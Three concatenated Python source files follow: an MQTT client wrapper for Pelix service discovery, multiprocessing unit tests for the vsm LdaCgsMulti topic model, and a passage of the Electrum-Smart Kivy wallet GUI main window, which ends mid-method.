# ------------------------------------------------------------------------------
class MqttClient(object):
"""
Remote Service discovery provider based on MQTT
"""
def __init__(self, client_id=None):
"""
Sets up members
:param client_id: ID of the MQTT client
"""
# No ID
if not client_id:
# Randomize client ID
self._client_id = self.generate_id()
elif len(client_id) > 23:
            # ID longer than the 23 characters allowed by the MQTT specification
            _logger.warning("MQTT Client ID '%s' is longer than 23 characters: "
                            "the server might reject it", client_id)
            # Keep the client ID anyway, as it might still be accepted
            self._client_id = client_id
else:
# Keep the ID as is
self._client_id = client_id
# Reconnection timer
self.__timer = threading.Timer(5, self.__reconnect)
# Publication events
self.__in_flight = {}
# MQTT client
self.__mqtt = paho.Client(self._client_id)
# Give access to Paho methods to configure TLS
self.tls_set = self.__mqtt.tls_set
# Paho callbacks
self.__mqtt.on_connect = self.__on_connect
self.__mqtt.on_disconnect = self.__on_disconnect
self.__mqtt.on_message = self.__on_message
self.__mqtt.on_publish = self.__on_publish
@property
def raw_client(self):
"""
Returns the raw client object, depending on the underlying library
"""
return self.__mqtt
@staticmethod
def on_connect(client, result_code):
"""
User callback: called when the client is connected
:param client: The Pelix MQTT client which connected
:param result_code: The MQTT result code
"""
pass
@staticmethod
def on_disconnect(client, result_code):
"""
User callback: called when the client is disconnected
:param client: The Pelix MQTT client which disconnected
:param result_code: The MQTT result code
"""
pass
@staticmethod
def on_message(client, message):
"""
User callback: called when the client has received a message
:param client: The Pelix MQTT client which received a message
:param message: The MQTT message
"""
pass
@classmethod
def generate_id(cls, prefix="pelix-"):
"""
Generates a random MQTT client ID
:param prefix: Client ID prefix (truncated to 8 chars)
:return: A client ID of 22 or 23 characters
"""
if not prefix:
# Normalize string
prefix = ""
else:
# Truncate long prefixes
prefix = prefix[:8]
# Prepare the missing part
nb_bytes = (23 - len(prefix)) // 2
random_bytes = os.urandom(nb_bytes)
if sys.version_info[0] >= 3:
random_ints = [char for char in random_bytes]
else:
random_ints = [ord(char) for char in random_bytes]
random_id = ''.join('{0:02x}'.format(value) for value in random_ints)
return "{0}{1}".format(prefix, random_id)
@classmethod
def topic_matches(cls, subscription_filter, topic):
"""
Checks if the given topic matches the given subscription filter
:param subscription_filter: A MQTT subscription filter
:param topic: A topic
:return: True if the topic matches the filter
"""
return paho.topic_matches_sub(subscription_filter, topic)
@property
def client_id(self):
"""
The MQTT client ID
"""
return self._client_id
def set_credentials(self, username, password):
"""
Sets the user name and password to be authenticated on the server
:param username: Client username
:param password: Client password
"""
self.__mqtt.username_pw_set(username, password)
def set_will(self, topic, payload, qos=0, retain=False):
"""
Sets up the will message
:param topic: Topic of the will message
:param payload: Content of the message
:param qos: Quality of Service
:param retain: The message will be retained
:raise ValueError: Invalid topic
:raise TypeError: Invalid payload
"""
self.__mqtt.will_set(topic, payload, qos, retain=retain)
def connect(self, host="localhost", port=1883, keepalive=60):
"""
Connects to the MQTT server. The client will automatically try to
reconnect to this server when the connection is lost.
:param host: MQTT server host
:param port: MQTT server port
:param keepalive: Maximum period in seconds between communications with
the broker
:raise ValueError: Invalid host or port
"""
# Disconnect first (it also stops the timer)
self.disconnect()
# Prepare the connection
self.__mqtt.connect(host, port, keepalive)
# Start the MQTT loop
self.__mqtt.loop_start()
def disconnect(self):
"""
Disconnects from the MQTT server
"""
# Stop the timer
self.__stop_timer()
# Unlock all publishers
for event in self.__in_flight.values():
event.set()
# Disconnect from the server
self.__mqtt.disconnect()
# Stop the MQTT loop thread
# Use a thread to avoid a dead lock in Paho
thread = threading.Thread(target=self.__mqtt.loop_stop)
thread.daemon = True
thread.start()
# Give it some time
thread.join(4)
def publish(self, topic, payload, qos=0, retain=False, wait=False):
"""
Sends a message through the MQTT connection
:param topic: Message topic
:param payload: Message content
:param qos: Quality of Service
:param retain: Retain flag
:param wait: If True, prepares an event to wait for the message to be
published
:return: The local message ID, None on error
"""
result = self.__mqtt.publish(topic, payload, qos, retain)
if wait and not result[0]:
# Publish packet sent, wait for it to return
self.__in_flight[result[1]] = threading.Event()
_logger.debug("Waiting for publication of %s", topic)
return result[1]
def wait_publication(self, mid, timeout=None):
"""
Wait for a publication to be validated
:param mid: Local message ID (result of publish)
:param timeout: Wait timeout (in seconds)
:return: True if the message was published, False if timeout was raised
:raise KeyError: Unknown waiting local message ID
"""
return self.__in_flight[mid].wait(timeout)
def subscribe(self, topic, qos=0):
"""
Subscribes to a topic on the server
:param topic: Topic filter string(s)
:param qos: Desired quality of service
:raise ValueError: Invalid topic or QoS
"""
self.__mqtt.subscribe(topic, qos)
def unsubscribe(self, topic):
"""
        Unsubscribes from a topic on the server
:param topic: Topic(s) to unsubscribe from
:raise ValueError: Invalid topic parameter
"""
self.__mqtt.unsubscribe(topic)
def __start_timer(self, delay):
"""
Starts the reconnection timer
:param delay: Delay (in seconds) before calling the reconnection method
"""
self.__timer = threading.Timer(delay, self.__reconnect)
self.__timer.daemon = True
self.__timer.start()
def __stop_timer(self):
"""
Stops the reconnection timer, if any
"""
if self.__timer is not None:
self.__timer.cancel()
self.__timer = None
def __reconnect(self):
"""
Tries to connect to the MQTT server
"""
# Cancel the timer, if any
self.__stop_timer()
try:
            # Try to reconnect to the server
result_code = self.__mqtt.reconnect()
if result_code:
# Something wrong happened
message = "Error connecting the MQTT server: {0} ({1})" \
.format(result_code, paho.error_string(result_code))
_logger.error(message)
raise ValueError(message)
except Exception as ex:
# Something went wrong: log it
_logger.error("Exception connecting server: %s", ex)
finally:
# Prepare a reconnection timer. It will be cancelled by the
# on_connect callback
self.__start_timer(10)
def __on_connect(self, client, userdata, flags, result_code):
"""
Client connected to the server
:param client: Connected Paho client
:param userdata: User data (unused)
:param flags: Response flags sent by the broker
:param result_code: Connection result code (0: success, others: error)
"""
if result_code:
# result_code != 0: something wrong happened
_logger.error("Error connecting the MQTT server: %s (%d)",
paho.connack_string(result_code), result_code)
else:
# Connection is OK: stop the reconnection timer
self.__stop_timer()
# Notify the caller, if any
if self.on_connect is not None:
try:
self.on_connect(self, result_code)
except Exception as ex:
_logger.exception("Error notifying MQTT listener: %s", ex)
def __on_disconnect(self, client, userdata, result_code):
"""
Client has been disconnected from the server
:param client: Client that received the message
:param userdata: User data (unused)
:param result_code: Disconnection reason (0: expected, 1: error)
"""
if result_code:
# rc != 0: unexpected disconnection
_logger.error(
"Unexpected disconnection from the MQTT server: %s (%d)",
paho.connack_string(result_code), result_code)
# Try to reconnect
self.__stop_timer()
self.__start_timer(2)
# Notify the caller, if any
if self.on_disconnect is not None:
try:
self.on_disconnect(self, result_code)
except Exception as ex:
_logger.exception("Error notifying MQTT listener: %s", ex)
def __on_message(self, client, userdata, msg):
"""
A message has been received from a server
:param client: Client that received the message
:param userdata: User data (unused)
:param msg: A MQTTMessage bean
"""
# Notify the caller, if any
if self.on_message is not None:
try:
self.on_message(self, msg)
except Exception as ex:
_logger.exception("Error notifying MQTT listener: %s", ex)
def __on_publish(self, client, userdata, mid):
"""
        A message published by this client has been acknowledged by the server
:param client: Client that received the message
:param userdata: User data (unused)
:param mid: Message ID
"""
try:
self.__in_flight[mid].set()
except KeyError:
pass
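# A minimal usage sketch, not part of the original module. It assumes an MQTT
# broker is reachable on localhost:1883; adjust host/port/topic as needed.
if __name__ == '__main__':
    import time
    client = MqttClient()
    client.on_message = lambda cl, msg: print(msg.topic, msg.payload)
    client.connect("localhost", 1883)
    client.subscribe("test/topic", qos=1)
    # publish with wait=True so wait_publication() can block on the broker ack
    mid = client.publish("test/topic", "hello", qos=1, wait=True)
    client.wait_publication(mid, timeout=5)
    time.sleep(1)  # give the network loop time to deliver the subscription
    client.disconnect()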
|
tests_ldacgsmulti.py
|
from __future__ import print_function
from builtins import zip
from builtins import range
from builtins import object
import unittest2 as unittest
import numpy as np
from vsm.corpus import Corpus
from vsm.corpus.util.corpusbuilders import random_corpus
from vsm.model.ldacgsseq import *
from vsm.model.ldacgsmulti import *
from multiprocessing import Process
class MPTester(object):
def test_LdaCgsMulti_phi(self):
c = random_corpus(1000, 50, 6, 100)
m0 = LdaCgsMulti(c, 'document', K=10)
m0.train(n_iterations=20)
phi = m0.word_top / m0.word_top.sum(0)
assert (phi.sum(axis=0) == 1.0).all()
assert phi.sum() == 10.0
def test_LdaCgsMulti_theta(self):
c = random_corpus(1000, 50, 6, 100)
m0 = LdaCgsMulti(c, 'document', K=10)
m0.train(n_iterations=20)
        theta = m0.top_doc / m0.top_doc.sum(0)
assert (theta.sum(axis=0) == 1.0).all()
assert theta.sum() == theta.shape[1]
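        # each theta column is a per-document topic distribution, so every
        # column sums to 1 and the grand total equals the number of documents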
def test_demo_LdaCgsMulti(self):
from vsm.model.ldacgsmulti import demo_LdaCgsMulti
demo_LdaCgsMulti()
def test_LdaCgsMulti_IO(self):
from tempfile import NamedTemporaryFile
import os
c = random_corpus(1000, 50, 6, 100)
tmp = NamedTemporaryFile(delete=False, suffix='.npz')
try:
m0 = LdaCgsMulti(c, 'document', K=10)
m0.train(n_iterations=20)
m0.save(tmp.name)
m1 = LdaCgsMulti.load(tmp.name)
assert m0.context_type == m1.context_type
assert m0.K == m1.K
assert (m0.alpha == m1.alpha).all()
assert (m0.beta == m1.beta).all()
assert m0.log_probs == m1.log_probs
for i in range(max(len(m0.corpus), len(m1.corpus))):
assert m0.corpus[i].all() == m1.corpus[i].all()
assert m0.V == m1.V
assert m0.iteration == m1.iteration
for i in range(max(len(m0.Z), len(m1.Z))):
assert m0.Z[i].all() == m1.Z[i].all()
assert m0.top_doc.all() == m1.top_doc.all()
assert m0.word_top.all() == m1.word_top.all()
assert m0.inv_top_sums.all() == m1.inv_top_sums.all()
assert m0.seeds == m1.seeds
for s0, s1 in zip(m0._mtrand_states,m1._mtrand_states):
assert s0[0] == s1[0]
assert (s0[1] == s1[1]).all()
assert s0[2:] == s1[2:]
m0 = LdaCgsMulti(c, 'document', K=10)
m0.train(n_iterations=20)
m0.save(tmp.name)
m1 = LdaCgsMulti.load(tmp.name)
assert not hasattr(m1, 'log_prob')
finally:
os.remove(tmp.name)
def test_LdaCgsMulti_SeedTypes(self):
""" Test for issue #74 issues. """
from tempfile import NamedTemporaryFile
import os
c = random_corpus(1000, 50, 6, 100)
tmp = NamedTemporaryFile(delete=False, suffix='.npz')
try:
m0 = LdaCgsMulti(c, 'document', K=10)
m0.train(n_iterations=20)
m0.save(tmp.name)
m1 = LdaCgsMulti.load(tmp.name)
for s0, s1 in zip(m0.seeds, m1.seeds):
assert type(s0) == type(s1)
for s0, s1 in zip(m0._mtrand_states,m1._mtrand_states):
for i in range(5):
assert type(s0[i]) == type(s1[i])
finally:
os.remove(tmp.name)
def test_LdaCgsMulti_random_seeds(self):
from vsm.corpus.util.corpusbuilders import random_corpus
c = random_corpus(1000, 50, 0, 20, context_type='document',
metadata=True)
m0 = LdaCgsMulti(c, 'document', K=10)
assert m0.seeds is not None
orig_seeds = m0.seeds
m1 = LdaCgsMulti(c, 'document', K=10, seeds=orig_seeds)
assert m0.seeds == m1.seeds
m0.train(n_iterations=5, verbose=0)
m1.train(n_iterations=5, verbose=0)
assert m0.seeds == orig_seeds
assert m1.seeds == orig_seeds
# ref:http://docs.scipy.org/doc/numpy/reference/generated/numpy.random.RandomState.get_state.html
for s0, s1 in zip(m0._mtrand_states,m1._mtrand_states):
assert s0[0] == 'MT19937'
assert s1[0] == 'MT19937'
assert (s0[1] == s1[1]).all()
assert s0[2:] == s1[2:]
assert m0.context_type == m1.context_type
assert m0.K == m1.K
assert (m0.alpha == m1.alpha).all()
assert (m0.beta == m1.beta).all()
assert m0.log_probs == m1.log_probs
for i in range(max(len(m0.corpus), len(m1.corpus))):
assert m0.corpus[i].all() == m1.corpus[i].all()
assert m0.V == m1.V
assert m0.iteration == m1.iteration
for i in range(max(len(m0.Z), len(m1.Z))):
assert m0.Z[i].all() == m1.Z[i].all()
assert m0.top_doc.all() == m1.top_doc.all()
assert m0.word_top.all() == m1.word_top.all()
assert m0.inv_top_sums.all() == m1.inv_top_sums.all()
def test_LdaCgsMulti_continue_training(self):
from vsm.corpus.util.corpusbuilders import random_corpus
c = random_corpus(1000, 50, 0, 20, context_type='document',
metadata=True)
m0 = LdaCgsMulti(c, 'document', K=10)
assert m0.seeds is not None
orig_seeds = m0.seeds
m1 = LdaCgsMulti(c, 'document', K=10, seeds=orig_seeds)
assert m0.seeds == m1.seeds
m0.train(n_iterations=2, verbose=0)
m1.train(n_iterations=5, verbose=0)
assert m0.seeds == orig_seeds
assert m1.seeds == orig_seeds
for s0, s1 in zip(m0._mtrand_states,m1._mtrand_states):
assert (s0[1] != s1[1]).any()
assert s0[2:] != s1[2:]
m0.train(n_iterations=3, verbose=0)
# ref:http://docs.scipy.org/doc/numpy/reference/generated/numpy.random.RandomState.get_state.html
for s0, s1 in zip(m0._mtrand_states,m1._mtrand_states):
assert s0[0] == 'MT19937'
assert s1[0] == 'MT19937'
assert (s0[1] == s1[1]).all()
assert s0[2:] == s1[2:]
assert m0.context_type == m1.context_type
assert m0.K == m1.K
assert (m0.alpha == m1.alpha).all()
assert (m0.beta == m1.beta).all()
assert m0.log_probs == m1.log_probs
for i in range(max(len(m0.corpus), len(m1.corpus))):
assert m0.corpus[i].all() == m1.corpus[i].all()
assert m0.V == m1.V
assert m0.iteration == m1.iteration
for i in range(max(len(m0.Z), len(m1.Z))):
assert m0.Z[i].all() == m1.Z[i].all()
assert m0.top_doc.all() == m1.top_doc.all()
assert m0.word_top.all() == m1.word_top.all()
assert m0.inv_top_sums.all() == m1.inv_top_sums.all()
def test_LdaCgsMulti_remove_Seq_props(self):
from vsm.corpus.util.corpusbuilders import random_corpus
c = random_corpus(1000, 50, 0, 20, context_type='document',
metadata=True)
m0 = LdaCgsMulti(c, 'document', K=10)
assert getattr(m0, 'seed', None) is None
assert getattr(m0, '_mtrand_state', None) is None
def test_LdaCgsMulti_eq_LdaCgsSeq(self):
from tempfile import NamedTemporaryFile
import os
c = random_corpus(1000, 50, 6, 100, seed=2)
tmp = NamedTemporaryFile(delete=False, suffix='.npz')
m0 = LdaCgsMulti(c, 'document', K=10, n_proc=1, seeds=[2])
m1 = LdaCgsSeq(c, 'document', K=10, seed=2)
for iteration in range(20):
m0.train(n_iterations=1, verbose=0)
m1.train(n_iterations=1, verbose=0)
assert m0.context_type == m1.context_type
assert m0.K == m1.K
assert (m0.alpha == m1.alpha).all()
assert (m0.beta == m1.beta).all()
for i in range(max(len(m0.corpus), len(m1.corpus))):
assert m0.corpus[i].all() == m1.corpus[i].all()
assert m0.V == m1.V
assert m0.iteration == m1.iteration
assert (m0.Z[i] == m1.Z[i]).all()
assert (m0.top_doc == m1.top_doc).all()
assert (m0.word_top == m1.word_top).all()
assert (np.isclose(m0.inv_top_sums, m1.inv_top_sums)).all()
assert m0.seeds[0] == m1.seed
assert m0._mtrand_states[0][0] == m1._mtrand_state[0]
for s0,s1 in zip(m0._mtrand_states[0][1], m1._mtrand_state[1]):
assert s0 == s1
assert m0._mtrand_states[0][2] == m1._mtrand_state[2]
assert m0._mtrand_states[0][3] == m1._mtrand_state[3]
assert m0._mtrand_states[0][4] == m1._mtrand_state[4]
print(iteration, m0.log_probs[-1], m1.log_probs[-1])
for i in range(iteration):
assert np.isclose(m0.log_probs[i][1], m1.log_probs[i][1])
def test_LdaCgsMulti_eq_LdaCgsSeq_multi(self):
from tempfile import NamedTemporaryFile
import os
c = random_corpus(1000, 50, 6, 100, seed=2)
tmp = NamedTemporaryFile(delete=False, suffix='.npz')
m0 = LdaCgsMulti(c, 'document', K=10, n_proc=1, seeds=[2])
m1 = LdaCgsSeq(c, 'document', K=10, seed=2)
for iteration in range(20):
m0.train(n_iterations=2, verbose=0)
m1.train(n_iterations=2, verbose=0)
assert m0.context_type == m1.context_type
assert m0.K == m1.K
assert (m0.alpha == m1.alpha).all()
assert (m0.beta == m1.beta).all()
for i in range(max(len(m0.corpus), len(m1.corpus))):
assert m0.corpus[i].all() == m1.corpus[i].all()
assert m0.V == m1.V
assert m0.iteration == m1.iteration
assert (m0.Z[i] == m1.Z[i]).all()
assert (m0.top_doc == m1.top_doc).all()
assert (m0.word_top == m1.word_top).all()
assert m0.seeds[0] == m1.seed
assert m0._mtrand_states[0][0] == m1._mtrand_state[0]
for s0,s1 in zip(m0._mtrand_states[0][1], m1._mtrand_state[1]):
assert s0 == s1
assert m0._mtrand_states[0][2] == m1._mtrand_state[2]
assert m0._mtrand_states[0][3] == m1._mtrand_state[3]
assert m0._mtrand_states[0][4] == m1._mtrand_state[4]
print(iteration, m0.log_probs[-1], m1.log_probs[-1])
for i in range(iteration):
assert np.isclose(m0.log_probs[i][1], m1.log_probs[i][1])
assert (np.isclose(m0.inv_top_sums, m1.inv_top_sums)).all()
class TestLdaCgsMulti(unittest.TestCase):
def setUp(self):
pass
def test_demo_LdaCgsMulti(self):
t = MPTester()
p = Process(target=t.test_demo_LdaCgsMulti, args=())
p.start()
p.join()
def test_LdaCgsMulti_IO(self):
t = MPTester()
p = Process(target=t.test_LdaCgsMulti_IO, args=())
p.start()
p.join()
def test_LdaCgsMulti_SeedTypes(self):
t = MPTester()
p = Process(target=t.test_LdaCgsMulti_SeedTypes, args=())
p.start()
p.join()
def test_LdaCgsMulti_random_seeds(self):
t = MPTester()
p = Process(target=t.test_LdaCgsMulti_random_seeds, args=())
p.start()
p.join()
def test_LdaCgsMulti_remove_Seq_props(self):
t = MPTester()
p = Process(target=t.test_LdaCgsMulti_remove_Seq_props, args=())
p.start()
p.join()
def test_LdaCgsMulti_continue_training(self):
t = MPTester()
p = Process(target=t.test_LdaCgsMulti_continue_training, args=())
p.start()
p.join()
def test_LdaCgsMulti_eq_LdaCgsSeq(self):
t = MPTester()
p = Process(target=t.test_LdaCgsMulti_eq_LdaCgsSeq, args=())
p.start()
p.join()
def test_LdaCgsMulti_eq_LdaCgsSeq_multi(self):
t = MPTester()
p = Process(target=t.test_LdaCgsMulti_eq_LdaCgsSeq_multi, args=())
p.start()
p.join()
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestLdaCgsMulti)
unittest.TextTestRunner(verbosity=2).run(suite)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum_smart as electrum
from electrum_smart.bitcoin import TYPE_ADDRESS
from electrum_smart import WalletStorage, Wallet
from electrum_smart_gui.kivy.i18n import _
from electrum_smart.paymentrequest import InvoiceStore
from electrum_smart.util import profiler, InvalidPassword
from electrum_smart.plugins import run_hook
from electrum_smart.util import format_satoshis, format_satoshis_plain
from electrum_smart.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_smart_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_smart_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_smart_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_smart_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register the widget cache; the timeout is set to forever so the cached
# data is kept for the lifetime of the app
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_smart_gui.kivy.uix.screens')
# Register fonts: without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_smart.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum_smart import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
        if len(names) > 1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, False)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mSMART')
def _set_bu(self, value):
        assert value in base_units
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
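    # e.g. fiat_to_btc('2.50') at an exchange rate of 100 yields
    # int(10**8 * 2.50 / 100) = 2500000 satoshis before formatting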
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''The current orientation of the window.
    Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read only `AliasProperty`. Defaults to 'landscape'.
    '''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read only `AliasProperty`. Defaults to 'phone'.
    '''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
        App.__init__(self)  # kwargs intentionally not forwarded to App
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', False)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
        # create triggers so that UI updates happen at most twice per second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_smart.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('smartcash:'):
self.set_URI(data)
return
# try to decode transaction
from electrum_smart.transaction import Transaction
from electrum_smart.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum_smart.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum_smart.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
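    # QR scanning is Android-only: launch SimpleScannerActivity via a Java
    # intent (pyjnius) and hand the decoded text to `on_complete`.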
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
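    # Shares plain text through Android's standard ACTION_SEND chooser.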
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
